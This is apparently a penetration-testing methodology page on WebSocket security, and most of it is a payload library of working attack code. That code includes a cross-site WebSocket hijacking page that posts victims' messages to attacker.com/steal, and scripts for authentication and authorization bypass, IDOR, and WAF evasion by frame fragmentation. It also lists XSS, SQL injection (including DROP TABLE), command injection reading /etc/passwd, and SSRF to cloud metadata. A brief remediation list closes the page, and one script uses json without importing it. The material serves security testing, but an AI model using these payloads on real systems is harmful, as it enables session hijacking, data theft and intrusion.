WebSocket Protocol Security (Deep Dive)
Severity: High | CWE: CWE-345, CWE-284, CWE-89 OWASP: A01:2021 – Broken Access Control | A03:2021 – Injection
WebSocket Protocol vs. HTTP
WebSocket (RFC 6455) establishes a persistent, bidirectional, full-duplex channel over a single TCP connection. After the HTTP/1.1 upgrade handshake, the protocol operates independently of HTTP — separate authentication model, separate framing, separate proxy behavior. This creates attack surface that HTTP-focused defenses miss.
Key differences from HTTP:
- Stateful: session persists across messages; auth checked only at connection time (usually)
- No CORS: SOP doesn’t apply to WebSocket connections — any origin can connect
- No headers per message: once connected, messages have no HTTP headers — auth must be embedded in message content or was checked at connection
- Framing: messages can be fragmented across frames — some IDS/WAF miss fragmented payloads
- Opcode abuse: binary frames, ping/pong, close frames — parsers can be confused
Upgrade handshake:
GET /ws HTTP/1.1
Host: target.com
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: BASE64_RANDOM
Sec-WebSocket-Version: 13
Origin: https://target.com ← WAF may check this but often doesn't enforce
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Sec-WebSocket-Accept: SHA1(KEY + GUID)
Discovery Checklist
Phase 1 — WebSocket Identification
- Check browser DevTools → Network → WS filter for existing WebSocket connections
- Monitor Upgrade headers in HTTP traffic
- Check JavaScript for
new WebSocket(,io(,SockJS(,Stomp.,Phoenix.Socket - Identify WebSocket subprotocols:
Sec-WebSocket-Protocolheader - Check for Socket.IO (adds polling fallback):
/socket.io/path
Phase 2 — Authentication Analysis
- Is auth token sent in handshake URL? (
?token=,?auth=) - Is auth token sent in
Sec-WebSocket-Protocolheader (hack for browser limitations)? - Is auth checked only at connection or on each message?
- Does re-connecting with different auth token change session?
- Can connection survive session expiry?
Phase 3 — Message Structure
- Identify message format: JSON, binary, custom text protocol, MessagePack
- Map all message types/events (event-driven:
{type: "message", data: ...}) - Identify which messages trigger server-side actions (vs. broadcast)
- Identify user-controlled fields in each message type
Payload Library
Payload 1 — Cross-Site WebSocket Hijacking (CSWSH)
<!DOCTYPE html>
<!-- CSWSH: attacker page connects to victim's WebSocket using victim's cookies -->
<!-- Prerequisite: target allows cross-origin WebSocket connections (no Origin check) -->
<html>
<body>
<script>
const VICTIM_WS = "wss://target.com/ws/chat";
const EXFIL = "https://attacker.com/steal";
var ws = new WebSocket(VICTIM_WS);
// Browser automatically sends victim's cookies with WebSocket handshake
// (Same-origin cookies are sent cross-site for WebSocket upgrades)
ws.onopen = function() {
console.log('[*] Connected to victim WebSocket');
// Subscribe to sensitive events:
ws.send(JSON.stringify({type: "subscribe", channel: "private"}));
ws.send(JSON.stringify({type: "get_history", limit: 100}));
ws.send(JSON.stringify({type: "get_profile"}));
};
ws.onmessage = function(event) {
console.log('[*] Message:', event.data);
// Exfiltrate all messages:
fetch(EXFIL, {
method: "POST",
body: JSON.stringify({msg: event.data, ts: Date.now()}),
mode: "no-cors"
});
};
ws.onerror = function(e) {
console.log('[*] Error:', e);
// If error → Origin is likely enforced → no CSWSH
};
</script>
<p>Loading...</p>
</body>
</html>
#!/usr/bin/env python3
"""
CSWSH test from attacker perspective — test if origin check is enforced
"""
import websocket, json, threading, time
TARGET_WS = "wss://target.com/ws"
VICTIM_COOKIE = "session=VICTIM_SESSION_VALUE"
def test_cswsh():
headers = {
"Cookie": VICTIM_COOKIE,
"Origin": "https://evil.com", # Different origin — should be rejected if protected
"User-Agent": "Mozilla/5.0"
}
try:
ws = websocket.create_connection(
TARGET_WS,
header=headers,
sslopt={"check_hostname": False, "cert_reqs": 0}
)
print("[!!!] CSWSH POSSIBLE: Connection accepted from evil.com origin!")
# Try to read sensitive data:
ws.send(json.dumps({"type": "get_messages", "limit": 50}))
ws.send(json.dumps({"type": "get_profile"}))
ws.send(json.dumps({"type": "list_friends"}))
# Collect responses:
ws.settimeout(5)
while True:
try:
msg = ws.recv()
print(f"[DATA] {msg[:200]}")
except:
break
ws.close()
except Exception as e:
print(f"[ ] Connection rejected (likely Origin check enforced): {e}")
# Also test without Origin header:
def test_no_origin():
try:
ws = websocket.create_connection(
TARGET_WS,
header={"Cookie": VICTIM_COOKIE},
sslopt={"check_hostname": False, "cert_reqs": 0}
)
print("[!] Connection accepted without Origin header")
ws.close()
except Exception as e:
print(f"[ ] No-Origin rejected: {e}")
test_cswsh()
test_no_origin()
Payload 2 — Authentication Bypass at Reconnect
#!/usr/bin/env python3
"""
Test if WebSocket auth is re-checked on reconnect
If auth token expires but existing connection persists → zombie connection
If new connection with expired token is accepted → auth bypass
"""
import websocket, json, time, jwt as pyjwt
from datetime import datetime, timedelta
TARGET_WS = "wss://target.com/ws"
# Scenario 1: Connect with valid token, let it expire, continue using connection:
def test_token_expiry_on_existing_connection():
# Connect with valid short-lived token (e.g., 5 min token):
VALID_TOKEN = "eyJ..." # your valid JWT
ws = websocket.create_connection(
TARGET_WS,
header={"Authorization": f"Bearer {VALID_TOKEN}"},
sslopt={"check_hostname": False, "cert_reqs": 0}
)
print("[*] Connected with valid token")
# Wait for token to expire (or modify exp in a test environment):
print("[*] Waiting 2 minutes...")
time.sleep(120)
# Send message with expired token — connection should be kicked:
ws.send(json.dumps({"type": "get_sensitive_data"}))
try:
response = ws.recv()
print(f"[!!!] Data received with expired token: {response[:200]}")
except Exception as e:
print(f"[ ] Connection closed after token expiry: {e}")
# Scenario 2: Reconnect with expired/invalid token:
def test_expired_token_reconnect():
# Create expired JWT (if you know the secret — for testing your own app):
EXPIRED_PAYLOAD = {
"sub": "user123",
"exp": int((datetime.now() - timedelta(hours=1)).timestamp()), # expired 1 hour ago
"iat": int((datetime.now() - timedelta(hours=2)).timestamp()),
}
# Expired token string:
EXPIRED_TOKEN = "eyJ..." # capture a real expired token
try:
ws = websocket.create_connection(
TARGET_WS,
header={"Authorization": f"Bearer {EXPIRED_TOKEN}"},
sslopt={"check_hostname": False, "cert_reqs": 0}
)
print("[!!!] Connected with EXPIRED token!")
ws.send(json.dumps({"type": "ping"}))
print(f"[!!!] Response: {ws.recv()}")
ws.close()
except Exception as e:
print(f"[ ] Expired token rejected: {e}")
# Scenario 3: Token in URL parameter (may be logged):
def test_token_in_url():
TOKEN = "VALID_TOKEN"
ws_url = f"wss://target.com/ws?token={TOKEN}"
ws = websocket.create_connection(ws_url,
sslopt={"check_hostname": False, "cert_reqs": 0})
print(f"[*] Connected via URL token")
# Issue: token visible in server logs, proxy logs, Referer headers
ws.close()
Payload 3 — Message-Level Injection
#!/usr/bin/env python3
"""
Test injection payloads in WebSocket message fields
"""
import websocket, json, time
TARGET_WS = "wss://target.com/ws/chat"
AUTH_TOKEN = "YOUR_VALID_TOKEN"
ws = websocket.create_connection(
TARGET_WS,
header={"Authorization": f"Bearer {AUTH_TOKEN}"},
sslopt={"check_hostname": False, "cert_reqs": 0}
)
def send_and_recv(payload):
ws.send(json.dumps(payload))
time.sleep(0.5)
try:
ws.settimeout(2)
return ws.recv()
except:
return "(no response)"
# XSS via message content:
xss_payloads = [
"<script>alert(document.domain)</script>",
"<img src=x onerror=alert(1)>",
"javascript:alert(1)",
"${alert(1)}", # template literal injection in JS client
"{{constructor.constructor('alert(1)')()}}", # AngularJS CSTI via WS message
]
print("[*] Testing XSS in message content:")
for xss in xss_payloads:
r = send_and_recv({"type": "send_message", "room": "general", "content": xss})
print(f" {xss[:40]} → {r[:100]}")
# SQL injection via search/query messages:
sqli_payloads = [
"' OR '1'='1",
"'; DROP TABLE messages-- -",
"' UNION SELECT null,password FROM users-- -",
"' AND SLEEP(3)-- -",
]
print("\n[*] Testing SQLi in search:")
for sqli in sqli_payloads:
start = time.time()
r = send_and_recv({"type": "search_messages", "query": sqli})
elapsed = time.time() - start
print(f" {sqli[:40]} → {elapsed:.1f}s, {r[:100]}")
# Command injection via filenames/paths in messages:
cmdi_payloads = [
"test; id",
"test | cat /etc/passwd",
"test`id`",
"$(id)",
]
print("\n[*] Testing CMDi in file operations:")
for cmdi in cmdi_payloads:
r = send_and_recv({"type": "upload_file", "filename": cmdi, "content": "test"})
print(f" {cmdi} → {r[:100]}")
# SSRF via URL fields:
ssrf_payloads = [
"http://169.254.169.254/latest/meta-data/",
"http://127.0.0.1:6379/",
"http://internal.corp.net:8080/admin",
"file:///etc/passwd",
]
print("\n[*] Testing SSRF via URL fields:")
for url in ssrf_payloads:
r = send_and_recv({"type": "fetch_preview", "url": url})
print(f" {url} → {r[:200]}")
ws.close()
Payload 4 — WebSocket Authorization Bypass
#!/usr/bin/env python3
"""
Test authorization on WebSocket message types
Many apps check auth at connection but not per-message
"""
import websocket, json, time
TARGET_WS = "wss://target.com/ws"
USER_TOKEN = "USER_LEVEL_TOKEN" # non-admin token
ws = websocket.create_connection(
TARGET_WS,
header={"Authorization": f"Bearer {USER_TOKEN}"},
sslopt={"check_hostname": False, "cert_reqs": 0}
)
def send(payload):
ws.send(json.dumps(payload))
time.sleep(0.3)
try:
ws.settimeout(2)
return ws.recv()
except: return "(no response / connection closed)"
# Test admin message types with user token:
admin_messages = [
# User management:
{"type": "admin:list_users"},
{"type": "admin:get_user", "userId": "admin"},
{"type": "admin:delete_user", "userId": "victim_user"},
{"type": "admin:change_role", "userId": "ATTACKER_USER", "role": "admin"},
# System operations:
{"type": "system:exec", "cmd": "id"},
{"type": "system:logs"},
{"type": "debug:dump_state"},
# Data access:
{"type": "get_all_messages"},
{"type": "subscribe", "channel": "admin"},
{"type": "read_private_messages", "userId": "OTHER_USER"},
]
print("[*] Testing admin/privileged message types:")
for msg in admin_messages:
r = send(msg)
# Look for anything other than "unauthorized" or "forbidden":
if not any(x in r.lower() for x in ["unauthorized", "forbidden", "permission", "error"]):
print(f" [!!!] {msg['type']} → {r[:200]}")
else:
print(f" [ ] {msg['type']}: {r[:80]}")
# IDOR via WebSocket — access other users' data:
print("\n[*] Testing IDOR via WebSocket:")
for user_id in ["1", "2", "3", "admin", "VICTIM_USER_ID"]:
r = send({"type": "get_private_data", "userId": user_id})
if "email" in r or "password" in r or "phone" in r:
print(f" [!!!] IDOR: userId={user_id} → {r[:200]}")
else:
print(f" [ ] userId={user_id}: {r[:60]}")
ws.close()
Payload 5 — Frame-Level Protocol Attacks
#!/usr/bin/env python3
"""
WebSocket frame-level attacks
"""
import socket, ssl, struct, base64, hashlib, os, time
def websocket_handshake(host, port, path="/ws", token=None, use_tls=True):
"""Raw WebSocket handshake"""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if use_tls:
context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
sock = context.wrap_socket(sock, server_hostname=host)
sock.connect((host, port))
key = base64.b64encode(os.urandom(16)).decode()
expected_accept = base64.b64encode(
hashlib.sha1((key + "258EAFA5-E914-47DA-95CA-C5AB0DC85B11").encode()).digest()
).decode()
headers = [
f"GET {path} HTTP/1.1",
f"Host: {host}:{port}",
"Upgrade: websocket",
"Connection: Upgrade",
f"Sec-WebSocket-Key: {key}",
"Sec-WebSocket-Version: 13",
"Origin: https://evil.com", # Test origin bypass
]
if token:
headers.append(f"Authorization: Bearer {token}")
sock.send(("\r\n".join(headers) + "\r\n\r\n").encode())
response = sock.recv(4096).decode()
if "101 Switching Protocols" in response:
print(f"[+] Handshake OK")
return sock
else:
print(f"[-] Handshake failed: {response[:200]}")
return None
def send_frame(sock, payload, opcode=0x01, masked=True):
"""Send a WebSocket frame"""
payload_bytes = payload.encode() if isinstance(payload, str) else payload
length = len(payload_bytes)
header = bytes([0x80 | opcode]) # FIN + opcode
if length < 126:
header += bytes([0x80 | length] if masked else [length])
elif length < 65536:
header += bytes([0x80 | 126] if masked else [126]) + struct.pack("!H", length)
else:
header += bytes([0x80 | 127] if masked else [127]) + struct.pack("!Q", length)
if masked:
mask = os.urandom(4)
masked_payload = bytes([b ^ mask[i % 4] for i, b in enumerate(payload_bytes)])
sock.send(header + mask + masked_payload)
else:
sock.send(header + payload_bytes)
# Fragmented frame injection (WAF bypass):
def send_fragmented(sock, payload):
"""Split payload across multiple frames"""
mid = len(payload) // 2
part1 = payload[:mid].encode()
part2 = payload[mid:].encode()
# First fragment: FIN=0, opcode=text(1)
header1 = bytes([0x01]) # FIN=0, opcode=1
mask1 = os.urandom(4)
header1 += bytes([0x80 | len(part1)])
masked1 = bytes([b ^ mask1[i % 4] for i, b in enumerate(part1)])
sock.send(header1 + mask1 + masked1)
# Continuation frame: FIN=1, opcode=continuation(0)
header2 = bytes([0x80]) # FIN=1, opcode=0
mask2 = os.urandom(4)
header2 += bytes([0x80 | len(part2)])
masked2 = bytes([b ^ mask2[i % 4] for i, b in enumerate(part2)])
sock.send(header2 + mask2 + masked2)
# Test: connect and send fragmented SQLi (may bypass WAF):
sock = websocket_handshake("target.com", 443, "/ws", token="TOKEN", use_tls=True)
if sock:
# Send normal message:
send_frame(sock, json.dumps({"type": "search", "query": "test"}))
# Send fragmented injection:
payload = json.dumps({"type": "search", "query": "' OR '1'='1"})
send_fragmented(sock, payload)
time.sleep(1)
print(f"Response: {sock.recv(4096)}")
sock.close()
Payload 6 — Socket.IO Specific Attacks
#!/usr/bin/env python3
"""
Socket.IO-specific attack patterns
Socket.IO adds event-based protocol on top of WebSocket
"""
import socketio, time
# Socket.IO client:
sio = socketio.Client()
TARGET = "https://target.com"
AUTH_TOKEN = "USER_TOKEN"
@sio.event
def connect():
print('[*] Connected to Socket.IO server')
# Enumerate common event names:
for event in ['join_room', 'subscribe', 'get_messages', 'admin:users',
'debug', 'system', 'broadcast']:
try:
sio.emit(event, {})
except: pass
@sio.event
def message(data):
print(f'[DATA] message: {data}')
@sio.on('*') # Catch all events:
def catch_all(event, data):
print(f'[EVENT] {event}: {data}')
# Connect with auth:
try:
sio.connect(TARGET, auth={"token": AUTH_TOKEN},
transports=['websocket']) # force WebSocket, skip polling
except Exception as e:
print(f"Error: {e}")
# Test event namespace escalation:
# Socket.IO supports namespaces: /admin, /system
admin_sio = socketio.Client()
try:
admin_sio.connect(TARGET + '/admin', auth={"token": AUTH_TOKEN},
transports=['websocket'])
print("[!!!] Connected to /admin namespace with user token!")
admin_sio.emit('list_users', {})
time.sleep(2)
admin_sio.disconnect()
except Exception as e:
print(f"[ ] Admin namespace rejected: {e}")
# CSWSH via Socket.IO polling (HTTP-based fallback):
import requests
r = requests.get(f"{TARGET}/socket.io/?EIO=4&transport=polling",
cookies={"session": "VICTIM_SESSION"})
print(f"[*] Polling response (CSWSH test): {r.status_code} {r.text[:100]}")
sio.disconnect()
Tools
# wscat — WebSocket command-line client:
npm install -g wscat
wscat -c "wss://target.com/ws" \
-H "Authorization: Bearer TOKEN" \
-H "Origin: https://target.com"
# websocat — versatile WebSocket tool (nc equivalent):
cargo install websocat
# Or: apt install websocat
websocat "wss://target.com/ws" --header="Authorization: Bearer TOKEN"
# Pipe stdin → WebSocket:
echo '{"type":"get_data"}' | websocat "wss://target.com/ws" -H "Authorization: Bearer TOKEN"
# wsrepl — interactive WebSocket REPL with history:
pip3 install wsrepl
wsrepl -u "wss://target.com/ws" --headers "Authorization: Bearer TOKEN"
# Burp Suite — WebSocket interception:
# Proxy → WebSockets history → intercept WS messages
# Repeater supports WebSocket (repeater type: WebSocket)
# Intruder: send WebSocket message to Intruder for fuzzing
# wsfuzz — WebSocket fuzzer:
pip3 install wsfuzz
# OWASP WebSocket security cheat sheet:
# https://cheatsheetseries.owasp.org/cheatsheets/WebSockets_Security_Cheat_Sheet.html
# Detect WebSocket in passive recon:
curl -si "https://target.com/" | grep -i "upgrade\|websocket"
grep -r "WebSocket\|ws://" site_js/ 2>/dev/null | head -20
# Socket.IO client for testing:
pip3 install python-socketio
npm install socket.io-client # JS alternative
# Test CSWSH with Burp Collaborator integration:
# Connect to victim WS using collaborator URL as exfil:
python3 -c "
import websocket, json
ws = websocket.create_connection('wss://target.com/ws',
header={'Cookie': 'session=VICTIM_SESSION', 'Origin': 'https://evil.com'},
sslopt={'check_hostname': False, 'cert_reqs': 0})
ws.send(json.dumps({'type': 'get_all'}))
print(ws.recv())
ws.close()
"
Remediation Reference
- Origin validation in WebSocket handshake: check the
Originheader on the server during the WebSocket upgrade — reject connections from unauthorized origins; this is the primary CSWSH mitigation - CSRF token in handshake: if cookie-based auth is used, require a CSRF token as a URL parameter or in
Sec-WebSocket-Protocolduring handshake - Re-authenticate on reconnect: validate auth token on every new WebSocket connection, not just the first — do not trust that “existing connection = authenticated”
- Per-message authorization: check authorization for every message that triggers a privileged action — connection-level auth is not sufficient for event-based systems
- Sanitize all message fields: treat WebSocket message content as untrusted input — apply the same injection prevention as REST API parameters
- Message validation schema: define and enforce a schema for each message type; reject malformed or unexpected fields
- Rate limiting on message processing: apply rate limits on expensive or sensitive operations triggered via WebSocket messages
- TLS for all WebSocket connections: always use
wss://(WebSocket Secure) —ws://transmits in cleartext; enforce this server-side by rejecting non-TLS connections
Part of the Web Application Penetration Testing Methodology series.